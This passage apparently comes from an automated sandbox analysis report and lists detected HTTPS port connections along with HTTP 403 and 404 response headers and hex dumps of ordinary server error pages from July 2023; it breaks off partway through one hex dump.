                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59601 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13415 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 11234 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19143 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61988 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63376 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13919 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19214 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57503 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51119
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2963 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13920 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12993 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19659 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57493 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51125
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16177 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6833 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17021 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6701
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6702
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8691 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51133
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51135
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9017 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51141
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19660 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9546 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17069 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13944 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12968 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54491 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8666 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16094 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17070 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9487 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58361 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8642 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10317 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64185 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61518 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15236 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56527 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10425 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17045 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13092 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53491 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14307 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51189
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:06 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:07 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:07 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:13 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:23 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:27 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:37 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:37 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:38 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:38 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:43 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:45 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:45 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:47 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:47 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:47 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:47 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:47 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:48 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:51 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:55 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:55 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:58 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:08:00 GMTContent-Type: text/htmlContent-Length: 75193Connection: closeVary: Accept-EncodingETag: "6459edff-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:02 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1688537148.43287918496322550X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Wed, 05 Jul 2023 06:05:48 GMTX-Served-By: cache-lin2290032-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4IqS8zPivBTUsdJc0mKredc,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:05:48 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 